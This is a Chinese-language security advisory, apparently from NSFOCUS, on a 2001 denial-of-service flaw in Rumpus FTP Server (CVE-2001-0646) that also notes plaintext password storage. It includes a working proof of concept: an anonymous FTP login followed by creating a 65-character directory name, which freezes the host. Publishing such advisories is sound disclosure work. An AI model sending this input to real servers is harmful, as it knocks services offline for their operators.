安全研究
安全漏洞
Rumpus FTP 服务器拒绝服务漏洞
发布日期:2001-05-18
更新日期:2001-05-18
受影响系统:Rumpus FTP Server v1.3.3, 2.0 dev 3
+ MacOS 8.6, 9.1
可能还有更早的版本
不受影响系统:Rumpus FTP Server v1.3.4
描述:
BUGTRAQ ID: 2716,2718
CVE(CAN) ID:
CVE-2001-0646
如果试图创建一个目录名长达 65 个字符的目录,Rumpus FTP 服务器和机器将僵住不动。
点击 'Force quit' 按钮强行退出并不起效果。另外,象大多数 macintosh 程序一样,
Rumpus FTP 服务器把口令以明文方式存放在prefs 文件夹中名为 'Rumpus User Database'
的文件中。厂商支持说新版的将对口令进行加密。
<* 来源:Jass Seljamaa (
jass@isp.ee) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
ftp 192.168.0.1
user anonymous
pass an@nymo.us
mkdir aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
建议:
临时解决办法:
NSFOCUS建议您把版本升级到 v1.3.4。
厂商补丁:
请与生产厂商 Maxum(
http://maxum.com) 联系,
版本 v1.3.4 中解决了这个问题。
浏览次数:3690
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |